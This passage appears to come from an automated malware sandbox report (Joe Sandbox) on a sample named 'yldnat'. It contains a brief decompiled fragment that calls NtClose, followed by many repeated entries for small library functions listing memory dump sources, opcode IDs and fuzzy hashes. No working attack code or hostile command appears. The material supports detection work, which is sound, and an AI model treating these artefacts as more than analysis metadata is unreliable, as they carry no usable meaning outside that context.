				_t3 = _t5 + 0xc6c; // 0x409d1f
				E0041AF20( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                        0x0041a403
                                                        0x0041a406
                                                        0x0041a40f
                                                        0x0041a417
                                                        0x0041a425
                                                        0x0041a429

                                                        APIs
                                                        • NtClose.NTDLL(00415940,?,?,00415940,004090B3,FFFFFFFF), ref: 0041A425
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                                        • Instruction ID: 546cb3561d9e7aa21b5d5b03fb8e98cc08bf9eb549cb728b05757c44382c4f14
                                                        • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                                        • Instruction Fuzzy Hash: 87D01772200214ABD620EB99DC89ED77BADDF48664F018056BA485B242C530FA1086E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008600C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00860048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00860078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008607AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
